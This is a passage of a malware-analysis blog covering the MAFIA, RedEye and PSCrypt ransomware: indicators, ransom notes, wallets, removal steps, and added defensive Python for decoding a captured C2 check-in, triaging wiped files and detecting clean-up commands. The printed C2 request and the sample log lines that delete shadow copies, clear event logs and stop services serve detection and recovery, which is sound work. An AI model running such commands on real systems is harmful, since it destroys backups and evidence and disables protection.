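    "GET /mafiaEgnima.php?iv=0x9e0x4b0x410x5c0x480x3a0xf40x90x2f0xfa0x960xb90x9b0x830xd40xb7"
    "&key=0xb90x1e0x600x3d0xef0x6c0xe60x930x6d0xab0x420x7b0x50x350xf00xcd0x3c0x490xc30x5f"
    "0xa10xe0xda0x270x5d0xd50xd10xa40xc0x9f0x340x79&seq=cbdf395c9281ae2ec52a306b5c29ec5 HTTP/1.1\r\n"
    "Host: wibkilmskir4rlxz.onion.pet\r\n"
    "Connection: keep-alive\r\n"
)

# Tor2web-style gateways seen in this campaign (both domains appear in the post).
TOR2WEB_SUFFIXES = (".onion.pet", ".onion.plus")


def decode_0x_run(value: str) -> bytes:
    """Decode the malware's byte encoding: every byte is printed as '0x' plus
    its hex value WITHOUT zero padding (0x9 for 0x09), and the bytes are
    concatenated.  Splitting on the literal '0x' prefix is unambiguous: a
    token is either '0' (the byte 0x00) or starts with a non-zero hex digit,
    so the next '0x' always marks the next byte."""
    if not value.startswith("0x"):
        raise ValueError("not a 0x-run: %r" % value)
    parts = value.split("0x")[1:]
    if any(not p or len(p) > 2 for p in parts):
        raise ValueError("malformed 0x-run: %r" % value)
    return bytes(int(p, 16) for p in parts)


def parse_checkin(raw: str) -> dict:
    """Parse request line + headers of a captured check-in; decode key and IV."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, val = line.split(":", 1)
            headers[name.strip().lower()] = val.strip()
    url = urlsplit(target)
    qs = parse_qs(url.query)
    return {
        "method": method,
        "host": headers.get("host", ""),
        "path": url.path,
        "seq": qs.get("seq", [""])[0],
        "iv": decode_0x_run(qs["iv"][0]),
        "key": decode_0x_run(qs["key"][0]),
    }


def looks_like_mafia_checkin(info: dict) -> list:
    """Return the reasons this request matches the MAFIA pattern (empty = no match)."""
    reasons = []
    if info["host"].endswith(TOR2WEB_SUFFIXES):
        reasons.append("Tor2web gateway host")
    if info["path"].endswith("/mafiaEgnima.php"):
        reasons.append("known C2 script name")
    # AES-256-CBC, as the post states: 32-byte key, 16-byte IV.
    if len(info["iv"]) == 16 and len(info["key"]) == 32:
        reasons.append("AES-256 key and 16-byte IV in query string")
    return reasons


if __name__ == "__main__":
    info = parse_checkin(SAMPLE_REQUEST)
    print("host :", info["host"])
    print("iv   :", info["iv"].hex())
    print("key  :", info["key"].hex())
    print("match:", looks_like_mafia_checkin(info))
```

Run against a proxy log or a PCAP export, the recovered key and IV are exactly what an AES-256-CBC decryption of a ".MAFIA" file would need; the same parser also serves as a simple network detection, since a 32-byte key and 16-byte IV in a GET to a Tor2web gateway is a pattern worth alerting on regardless of the script name.<br />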
<br />
There are several other MAFIA binaries out there, such as:<br />
<br />
<blockquote class="tr_bq">
<i>f4b25591ae53504ef5923344a9f03563<br />da23c8a7be5d83ae3e6b7b3291fdb880<br />0776e348313c7680db86ed924cff10b8<br />6487edd9b1e7cf6be4a9b1ac57424548<br />119228fb8f4333b1c10ff03543c6c0ea</i></blockquote>
<div>
<br /></div>
<div>
Three of these (<i>119228fb8f4333b1c10ff03543c6c0ea, </i><i>0776e348313c7680db86ed924cff10b8 and </i><i>6487edd9b1e7cf6be4a9b1ac57424548</i>) have a different C2 server, specifically:</div>
<div>
<b>wibkilmskir4rlxz.onion[.]plus</b>.</div>
<div>
<i><br /></i></div>
<div>
Neither of these servers appeared to be online at the time of writing.</div>
<div>
<br /></div>
<div>
Decryption is possible thanks to Michael Gillespie (<a href="https://twitter.com/demonslay335" target="_blank">@demonslay335</a>).<br />
<br />
Download the decrypter from:<br />
<a href="https://download.bleepingcomputer.com/demonslay335/MAFIADecrypter.zip">https://download.bleepingcomputer.com/demonslay335/MAFIADecrypter.zip</a><br />
<br />
In case of questions or feedback, be sure to leave a comment.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>Indicators</b></div>
<div>
<b><br /></b></div>
<script src="https://otx.alienvault.com/pulse/5b70534f319dba7ddcdaab8f.js"></script>
<br />
<div>
<b><br /></b></div>
<br /><b><span style="font-size: large;">RedEye ransomware: there's more than meets the eye</span></b><br />
Published 2018-06-07 by Bart<br />
<br />
A rather anonymous account reached out to me on Twitter asking to check out a "scary & really nasty" sample.<br />
<br />
It turned out to be RedEye ransomware, a new strain or variant by the same creator of <a href="https://twitter.com/bartblaze/status/965696929043812352" target="_blank">Annabelle ransomware</a>, which I discovered in February earlier this year.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
This ransomware is named "<b>RedEye</b>" by the author "<b>iCoreX</b>".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Qf6RNLgc8VI/Wxhbej0HsrI/AAAAAAAACFg/6grtwbvXaskYrMKCH1sZWU46ifXiUvA9ACLcBGAs/s1600/ico.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="256" data-original-width="256" height="200" src="https://4.bp.blogspot.com/-Qf6RNLgc8VI/Wxhbej0HsrI/AAAAAAAACFg/6grtwbvXaskYrMKCH1sZWU46ifXiUvA9ACLcBGAs/s200/ico.png" width="200" /></a></div>
<br />
<br />
Properties:<br />
<ul>
<li><b>MD5</b>: 832090ba6fe32a3c7c36dbd76f270215</li>
<li><b>SHA1</b>: 804b8e85f38de8b82a961401836ccec5880342e6</li>
<li><b>SHA256</b>: 1a8b7a6547b743ea01bb0ac057c91228c10dc8f99562ce2b06e25893161776bb</li>
<li><b>Compilation timestamp</b>: 2018-05-03 10:04:35</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/1a8b7a6547b743ea01bb0ac057c91228c10dc8f99562ce2b06e25893161776bb/analysis/" target="_blank">1a8b7a6547b743ea01bb0ac057c91228c10dc8f99562ce2b06e25893161776bb</a></li>
</ul>
<div>
<br /></div>
<div>
The first noticeable thing about this file is the huge filesize: 35.0 MB (36657152 bytes). This is due to several media files, specifically images and audio files, embedded in the binary.</div>
<div>
<br /></div>
<div>
It contains three ".wav" files:</div>
<div>
<ul>
<li><i>child.wav</i></li>
<li><i>redeye.wav</i></li>
<li><i>suicide.wav</i></li>
</ul>
<div>
All three audio files play a "creepy" sound, intended to scare the user. </div>
</div>
<div>
<br /></div>
<div>
Additionally, the binary is protected with ConfuserEx, compression, and a few other tricks. It also embeds a second binary, responsible for replacing the MBR, with the following properties:</div>
<div>
<br /></div>
<div>
<ul>
<li><b>MD5</b>: 878a10cda09fec2cb823f2b7138b550e</li>
<li><b>SHA1</b>: db44dae60c12853cdbe62ec9f7b3493a897e519a</li>
<li><b>SHA256</b>: f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7</li>
<li><b>Compilation timestamp </b>(<i>Delphi</i>): 1992-06-19 22:22:17</li>
<li><b>Compilation timestamp </b>(<i>Actual</i>): 2018-06-04 14:23:36</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7/analysis/1528323468/" target="_blank">f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7</a></li>
</ul>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
What actually happens when executing this ransomware? Just like <a href="https://www.bleepingcomputer.com/news/security/the-annabelle-ransomware-is-a-horrific-mess/" target="_blank">Annabelle</a> ransomware, it performs a set of actions to make removal difficult: for example, it disables Task Manager and, in this iteration, also hides your drives.</div>
<div>
<br /></div>
<div>
Similar to before, a ransom message is then displayed as follows:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-Y3XcM4XWL1o/WxhXu5jnKTI/AAAAAAAACFM/iX7nuANM9IIgB5yUlJ5oNI-BCj97L2fiQCLcBGAs/s1600/Capture.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="869" data-original-width="1600" height="216" src="https://1.bp.blogspot.com/-Y3XcM4XWL1o/WxhXu5jnKTI/AAAAAAAACFM/iX7nuANM9IIgB5yUlJ5oNI-BCj97L2fiQCLcBGAs/s400/Capture.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - RedEye Ransomware</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The message reads:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<blockquote class="tr_bq" style="clear: both;">
<i>All your personal files has been encrypted with an very strong key by RedEye!<br />(Rijndael-Algorithmus - AES - 256 Bit)<br />The only way to get your files back is:<br />- Go to http://redeye85x9tbxiyki.onion/tbxIyki - Enter your Personal ID<br />and pay 0.1 Bitcoins to the adress below! After that you need to click on<br /> "Check Payment". Then you will get a special key to unlock your computer.<br />You got 4 days to pay, when the time is up,<br />then your PC will be fully destroyed!</i></blockquote>
<div class="separator" style="clear: both; text-align: left;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The ransomware has several options which I won't be showing here, but in short, it can:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><i>Show encrypted files</i></li>
<li><i>Decrypt files</i></li>
<li><i>Support</i></li>
<li><i>Destroy PC</i></li>
</ul>
<br />
<div class="" style="clear: both; text-align: left;">
The Destroy PC option shows a GIF as background where you have the option to select "Do it" and "Close". I won't display the image however.</div>
<div class="" style="clear: both; text-align: left;">
<br /></div>
<div class="" style="clear: both; text-align: left;">
RedEye claims to encrypt files securely with AES256. On my machine, it appears to overwrite or fill files with 0 bytes, rendering the files useless, and appending the "<b>.RedEye</b>" extension.</div>
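<div class="" style="clear: both; text-align: left;">
An added example (not from the original post) of how to check that observation without running the malware: byte-frequency entropy separates genuinely encrypted output (close to 8 bits per byte) from files that were merely zero-filled (0 bits per byte), so a responder can tell a wiper from true ransomware from the victim files alone. The sample files and the thresholds are my own assumptions, not values from the post.</div>

```python
"""Triage suspected-ransomware output: encrypted or merely wiped?

Added example, not from the original post. RedEye advertises AES-256 but,
as observed above, left files filled with zero bytes. Shannon entropy of the
byte distribution tells the two apart: ciphertext is close to 8 bits/byte,
a constant fill is 0 bits/byte. Sample files are constructed in memory.
"""
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty or constant data)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes) -> str:
    """Verdict for one file body.  Thresholds are assumptions for this example:
    above 7.5 bits/byte reads as encrypted or compressed, below 1.0 as a
    wiped/constant fill, anything in between as ordinary plain data."""
    if not data:
        return "empty"
    if all(b == 0 for b in data):           # the exact RedEye-style case
        return "zero-filled"
    h = shannon_entropy(data)
    if h > 7.5:
        return "high-entropy (encrypted/compressed)"
    if h < 1.0:
        return "low-entropy (wiped/constant)"
    return "plain data"


def triage(files: dict) -> dict:
    """Map file name -> verdict, for the files carrying the .RedEye extension."""
    return {name: classify(body) for name, body in files.items()
            if name.lower().endswith(".redeye")}


# Constructed samples: a zero-filled victim like the one described, a
# random-byte file standing in for real AES output, and an untouched file.
SAMPLE_FILES = {
    "holiday.jpg.RedEye": b"\x00" * 4096,
    "report.docx.RedEye": os.urandom(4096),
    "notes.txt": b"meeting at 10\n" * 100,
}

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_FILES).items():
        print(f"{name}: {verdict}")
```

The distinction matters for recovery: a zero-filled file holds no ciphertext to decrypt, so the only routes back are backups, Shadow Volume Copies or file-carving tools such as those listed under Removal below.<br />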
<div class="" style="clear: both; text-align: left;">
<br /></div>
<div class="" style="clear: both; text-align: left;">
When the time runs out or the "Do it" option is selected, the machine reboots and the replaced MBR, again similar to Annabelle ransomware, displays the following message:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-pUV0vgsmw7M/WxhXu0A-izI/AAAAAAAACFE/OnoyIHPZ4FgYyyqk_NvddCSywptTxAooQCLcBGAs/s1600/mr.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="420" data-original-width="1253" height="133" src="https://3.bp.blogspot.com/-pUV0vgsmw7M/WxhXu0A-izI/AAAAAAAACFE/OnoyIHPZ4FgYyyqk_NvddCSywptTxAooQCLcBGAs/s400/mr.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - MBR lock screen</td></tr>
</tbody></table>
<br />
The message reads as follows:<br />
<br />
<blockquote class="tr_bq">
<i>RedEye Terminated your computer!<br />The reason for that could be:<br />- The time has expired<br />- You clicked on the 'Destroy PC' button<br />There is no way to fix your PC! Have Fun to try it :)<br />My YouTube Channel: iCoreX &lt;- Subscribe :P<br />Add me on discord! iCoreX#3333 &lt;- my old account, named iCoreX, got terminated by Discord<br />Creator of Annabelle &amp; Jigsaw ransomware, RedEye</i></blockquote>
<br />
<br />
The author, iCoreX, claims to have created Jigsaw, Annabelle, and now the RedEye ransomware; whether the first claim is true, I'll leave open.<br />
<br />
Details on the ransomware:<br />
<br />
<b>Extension</b>: .RedEye<br />
<b>BTC Wallet</b>: 1JSHVxXnGDydVXVamFW9AEmk3vk8cF8Vuj<br />
<b>Payment portal</b> (currently offline): http://redeye85x9tbxiyki[.]onion<br />
<br />
<div>
At the time of writing, no payments appear to have been made:</div>
<div>
<a href="https://blockchain.info/address/1JSHVxXnGDydVXVamFW9AEmk3vk8cF8Vuj">https://blockchain.info/address/1JSHVxXnGDydVXVamFW9AEmk3vk8cF8Vuj</a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-size: large;"><b>Removal</b></span></div>
<div>
<br /></div>
<div>
You <i>may</i> be able to restore the MBR, or your files, if you catch the ransomware in the act and shut down the machine at that point. <a href="https://www.howtogeek.com/107511/how-to-boot-into-safe-mode-on-windows-8-the-easy-way/" target="_blank">Reboot in safe mode</a> and copy over or <a href="https://www.howtogeek.com/242428/whats-the-best-way-to-back-up-my-computer/" target="_blank">back up</a> your files.<br />
<br />
If tools such as the registry editor are not working, run <a href="https://www.bleepingcomputer.com/download/rkill/" target="_blank">Rkill</a> in safe mode first.<br />
<br />
Then, <a href="https://www.howtogeek.com/howto/32523/how-to-manually-repair-windows-7-boot-loader-problems/" target="_blank">Restore the MBR</a>, and <a href="https://www.howtogeek.com/133254/beginner-geek-how-to-reinstall-windows-on-your-computer/" target="_blank">reinstall Windows</a>.<br />
<br />
You may also try to restore the MBR <i>first</i>, and then attempt to restore files using Shadow Volume Copies. For example, a tool such as <a href="http://www.shadowexplorer.com/" target="_blank">Shadow Explorer</a> can be of assistance, or read the tutorial <a href="https://www.bleepingcomputer.com/tutorials/how-to-recover-files-and-folders-using-shadow-volume-copies/" target="_blank">here</a>.<br />
<br />
If that doesn't work either, you may try using a data recovery program such as <a href="http://www.cgsecurity.org/wiki/PhotoRec" target="_blank">PhotoRec</a> or <a href="https://www.piriform.com/recuva" target="_blank">Recuva</a>.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-size: large;"><b>Conclusion</b></span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
While it appears that the RedEye ransomware has even more tricks up its sleeve than its predecessor Annabelle, the same conclusion holds true: do <b>not </b>pay the ransom.</div>
<div>
<br /></div>
<div>
As for the actual purpose of the ransomware: it may be considered ransomware of the wiper kind; however, it appears the author mainly likes to showcase his or her skill.</div>
<div>
<br /></div>
<div>
You can read more on the purpose of ransomware <a href="https://bartblaze.blogspot.com/p/the-purpose-of-ransomware.html" target="_blank">here</a>.</div>
<div>
<br /></div>
<div>
<br />
<br />
<b>IOCs</b><br />
<br /></div>
<script src="https://otx.alienvault.com/pulse/5b1861d1f5cfbf1ff96ac5ab.js"></script><br />
<br />
<b><span style="font-size: large;">PSCrypt ransomware: back in business</span></b><br />
Published 2018-05-07 by Bart<br />
<br />
PSCrypt is ransomware first discovered last year, in 2017, targeting users and organisations alike in Ukraine; the malware itself is based on GlobeImposter ("GI") ransomware.<br />
<br />
I've written about PSCrypt in the past, when it was distributed via Crystal Finance Millenium's hacked website: <a href="https://bartblaze.blogspot.co.uk/2017/08/crystal-finance-millennium-used-to.html" target="_blank">Crystal Finance Millennium used to spread malware</a><br />
<br />
In this quick blog post, we'll take a look at the latest iteration of PSCrypt.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
A file named "xls.scr", which sports a fancy "energy" or "power" icon, is responsible for loading PSCrypt on the machine; it was spread via a phishing campaign.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-Srpd-y5aHXc/WvAzhsFlLII/AAAAAAAACD0/Bc7DyZ7D8q0UPpMY4mUTvQ-9IWbrXzL_QCLcBGAs/s1600/ico.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="72" data-original-width="72" src="https://2.bp.blogspot.com/-Srpd-y5aHXc/WvAzhsFlLII/AAAAAAAACD0/Bc7DyZ7D8q0UPpMY4mUTvQ-9IWbrXzL_QCLcBGAs/s1600/ico.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Icon</td></tr>
</tbody></table>
<br />
The ransomware has the following properties:<br />
<br />
<ul>
<li><b>MD5</b>: aec5498f95a19ac143534283592544b4</li>
<li><b>SHA1</b>: 351d043a0955714031d1989e00d9fe3b84eaa823</li>
<li><b>SHA256</b>: 43584bfb791047af592c883b8707289137082f024a851b082762d3100f1f0941</li>
<li><b>Compilation timestamp</b>: 2018-04-24 00:15:26</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/43584bfb791047af592c883b8707289137082f024a851b082762d3100f1f0941/analysis/" target="_blank">43584bfb791047af592c883b8707289137082f024a851b082762d3100f1f0941</a></li>
</ul>
<br />
As mentioned earlier, PSCrypt is based on GlobeImposter and as such, has very similar functionality.<br />
<br />
The following folders are excluded from being encrypted:<br />
<br />
<blockquote class="tr_bq">
<i>Avast, Avira, COMODO, Chrome, Common Files, Dr.Web, ESET, Internet Explorer, Kaspersky Lab, McAfee, Microsoft, Microsoft Help, Microsoft Shared, Microsoft.NET, Movie Maker, Mozilla Firefox, NVIDIA Corporation, Opera, Outlook Express, ProgramData, Symantec, Symantec_Client_Security, Windows, Windows App Certification Kit, Windows Defender, Windows Kits, Windows Mail, Windows Media Player, Windows Multimedia Platform, Windows NT, Windows Phone Kits, Windows Phone Silverlight Kits, Windows Photo Viewer, Windows Portable Devices, Windows Sidebar, WindowsPowerShell, Wsus, YandexBrowser, ntldr, spytech software, sysconfig, system volume information</i></blockquote>
<br />
This iteration of PSCrypt will encrypt <b>all </b>files, including executables, <i>except </i>those files with the following extensions:<br />
<br />
<blockquote class="tr_bq">
<i>.$er,.4db,.4dd,.4d,.4mp,.abs,.abx,.accdb,.accdc</i></blockquote>
<br />
As usual, a temporary batch file will be used to clear Volume Shadow Copies as well as Event Logs:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-vgoS_8jFV90/WvA1GCA_SUI/AAAAAAAACEA/TNphLhlXa4E4YRrIeqLpJBqPa3LVEAgzQCLcBGAs/s1600/vss.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="262" data-original-width="1187" height="87" src="https://3.bp.blogspot.com/-vgoS_8jFV90/WvA1GCA_SUI/AAAAAAAACEA/TNphLhlXa4E4YRrIeqLpJBqPa3LVEAgzQCLcBGAs/s400/vss.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Batch file</td></tr>
</tbody></table>
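The batch file itself is only shown as a screenshot, so as an added example (not code from the original post) here is the detection side: a scanner over process-creation command lines (the kind exported from Sysmon event 1 or Windows event 4688) that flags shadow-copy deletion and event-log clearing, and also the <i>sc stop</i> of a security service seen in the MAFIA analysis above. The log lines and the field layout are constructed for this example; the exact commands in PSCrypt's batch file are not reproduced from the post, and the command patterns are the commonly documented ones.<br />

```python
"""Flag the clean-up commands ransomware batch files typically run.

Added example, not from the original post. Scans constructed
process-creation records ('Key=Value' fields, CommandLine quoted) for the
clean-up steps described in the post: Volume Shadow Copy deletion, Event
Log clearing, and stopping a protective service.
"""
import re
from collections import defaultdict

# (label, regex over the full command line); case-insensitive.
RULES = [
    ("shadow copy deletion (vssadmin)",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I)),
    ("shadow copy deletion (wmic)",
     re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("event log clearing (wevtutil)",
     re.compile(r"\bwevtutil(\.exe)?\b\s+(cl|clear-log)\b", re.I)),
    ("service stop (sc)",
     re.compile(r"\bsc(\.exe)?\b\s+stop\b", re.I)),
]

# Constructed record format: space-separated Key=Value, quoted when spaces occur.
FIELD_RX = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Parse one constructed process-creation record into a dict of fields."""
    return {k: v.strip('"') for k, v in FIELD_RX.findall(line)}


def match_command(cmdline: str) -> list:
    """Labels of every rule the command line triggers (empty list = benign)."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def scan(lines) -> list:
    """Per-record hits as (line_no, parent_pid, cmdline, labels)."""
    hits = []
    for i, line in enumerate(lines, 1):
        ev = parse_event(line)
        labels = match_command(ev.get("CommandLine", ""))
        if labels:
            hits.append((i, ev.get("ParentProcessId", "?"), ev["CommandLine"], labels))
    return hits


def correlate(hits) -> dict:
    """Group hit labels by parent PID: the batch file's cmd.exe is the parent
    of every command it runs, so several labels under one parent means one
    script did all of it."""
    by_parent = defaultdict(set)
    for _, ppid, _, labels in hits:
        by_parent[ppid].update(labels)
    return {ppid: sorted(labels) for ppid, labels in by_parent.items()}


def high_confidence_parents(hits) -> list:
    """Parents that both deleted shadow copies and cleared logs."""
    return [ppid for ppid, labels in correlate(hits).items()
            if any("shadow copy" in l for l in labels)
            and any("event log" in l for l in labels)]


# Constructed sample log: one batch-driven clean-up (parent 4120), a benign
# process, a lone wmic call, and the 'sc stop AppCheck' from the MAFIA post.
SAMPLE_LOG = [
    'EventID=1 ParentProcessId=4120 ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\vssadmin.exe CommandLine="vssadmin.exe Delete Shadows /All /Quiet"',
    'EventID=1 ParentProcessId=4120 ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\wevtutil.exe CommandLine="wevtutil.exe cl System"',
    'EventID=1 ParentProcessId=4120 ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\wevtutil.exe CommandLine="wevtutil.exe cl Security"',
    'EventID=1 ParentProcessId=2288 ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe C:\\Users\\bob\\notes.txt"',
    'EventID=1 ParentProcessId=3377 ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\wbem\\WMIC.exe CommandLine="wmic shadowcopy delete"',
    'EventID=1 ParentProcessId=5100 ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\sc.exe CommandLine="sc stop AppCheck"',
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for line_no, ppid, cmd, labels in hits:
        print(f"line {line_no} (parent {ppid}): {cmd} -> {', '.join(labels)}")
    print("high-confidence parents:", high_confidence_parents(hits))
```

Single hits are noisy (administrators do clear logs and prune shadow copies), which is why the correlation step matters: one parent process issuing both within a short window is the ransomware-batch signature, and is worth an alert even before any file is renamed to <b>.docs</b>.<br />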
<br />
What's new in this iteration of PSCrypt is not only the changes implemented by/via GlobeImposter ransomware, but also the ransom note itself, as shown in Figures 3 and 4 below:<br />
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-TLVThZQ-2qU/WvA28mTwoGI/AAAAAAAACEQ/INdjR_AkaREvHpWms2Di4Z8bN2vQAuJxACLcBGAs/s1600/note-p1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="858" data-original-width="899" height="381" src="https://4.bp.blogspot.com/-TLVThZQ-2qU/WvA28mTwoGI/AAAAAAAACEQ/INdjR_AkaREvHpWms2Di4Z8bN2vQAuJxACLcBGAs/s400/note-p1.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Ransomware note, part 1</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-TU9XuZd794c/WvA28vCGN4I/AAAAAAAACEM/UBsjfuvSxgsnPjdrAPIiMyARrt8PwxHIQCLcBGAs/s1600/note-p2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="907" data-original-width="827" height="400" src="https://2.bp.blogspot.com/-TU9XuZd794c/WvA28vCGN4I/AAAAAAAACEM/UBsjfuvSxgsnPjdrAPIiMyARrt8PwxHIQCLcBGAs/s400/note-p2.PNG" width="363" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Ransomware note, part 2</td></tr>
</tbody></table>
<br />
The title of the ransom note is "Ваші файли тимчасово зашифрувати! Не хвилюйтесь!", which translates to "Your files are temporarily encrypted! Do not worry!".<br />
<div>
<br />
<div>
<br /></div>
<div>
The Ukrainian version is rather lengthy, and is as follows:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>☠ ВАШІ ФАЙЛИ ТИМЧАСОВО НЕДОСТУПНІ.☠<br />ВАШІ ДАНІ БУЛИ ЗАШІВРОВАННИ!<br />Для відновлення даних потрібно дешифратор.<br />Щоб отримати дешифратор, ви повинні, оплатити послуги розшифровки:<br />Оплата відбувається за коштами біткойн на кошелек № 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9<br />Вартість послуги складає 150$<br />Оплату можна провести в терміналі IBox. або виберіть один з обмінних сайтів на сторінці - https://www.bestchange.ru/privat24-uah-to-bitcoin.html (приклад обмін Приват24 на BTC) також можете скористатися послугами https://e-btc.com.ua<br />Додаткова інформація:<br />Програма можемо дешифрувати один файл як доказ того, що у неї є декодер. Для цього необхідно надіслати зашифрований файл - вагою не більше 2 mb, и ваш уникальный идентификационный код, на пошту: systems32x@gmail.com<br />Более детальная инструкция по оплате: https://btcu.biz/main/how_to/buy<br />Увага!<br />Всі файли розшифровуються тільки після 100% оплати<br />Ви дійсно отримуєте дешифратор після оплати<br />Не намагайтеся видалити програму або запустити антивірусні інструменти це може ускладнити вам роботу<br />Спроби самодешіфрованія файлів приведуть до втрати ваших даних<br />Декодери інших користувачів не сумісні з вашими даними, оскільки унікальний ключ шифрування кожного користувача.<br />За запитом користувачів, надаємо контакти клієнтів, які вже користувалися послугами нашого сервісу.<br />ОБОВ'ЯЗКОВО ЗАПИШІТЬ РЕЗЕРВНІ КОНТАКТИ ДЛЯ ЗВ'ЯЗКУ:<br />systems32x@gmail.com - основний<br />systems32x@yahoo.com - резервний<br />Додаткові контакти:<br />systems32x@tutanota.com - (якщо відповіді не прийшло після 24-х годин)<br />help32xme@usa.com - (якщо відповіді не прийшло після 24-х годин)<br />Additional.mail@mail.com - (якщо відповіді не прийшло після 24-х годин)<br />З повагою<br />Unlock files LLC<br />33530 1st Way South Ste. 102<br />Federal Way, WA 98003<br />United States</i></blockquote>
<div>
<i><br /></i></div>
<div>
Google Translate, so pretty loose; I've made some minor corrections however:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>☠ YOUR FILES ARE TEMPORARILY UNAVAILABLE<br />YOUR DATA WAS LOCKED!<br />To restore data you need a decoder.<br />To receive a decoder, you must pay for decoding services:<br />Payment is made at the expense of bitcoin to wallet number 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9<br />Service cost is $ 150<br />Payment can be made at the terminal IBox. or select one of the exchange sites on the page - https://www.bestchange.ru/privat24-uah-to-bitcoin.html (example exchange of Privat24 to the BTC), you can also use the services of https://e-btc.com.ua.<br />Additional Information:<br />The program can decrypt one file as proof that it has a decoder. To do this, you need to send an encrypted file weighing no more than 2 mb and your unique identification code by mail: systems32x@gmail.com<br />More detailed payment instructions: https://btcu.biz/main/how_to/buy<br />WARNING!<br />All files are decrypted only after 100% payment<br />You really get a decoder after payment<br />Do not try to uninstall a program or run antivirus tools, which can complicate your work<br />Attempts to self-decrypt files will result in the loss of your data<br />Other users' decoders are not compatible with your data, as the unique encryption key for each user.<br />At 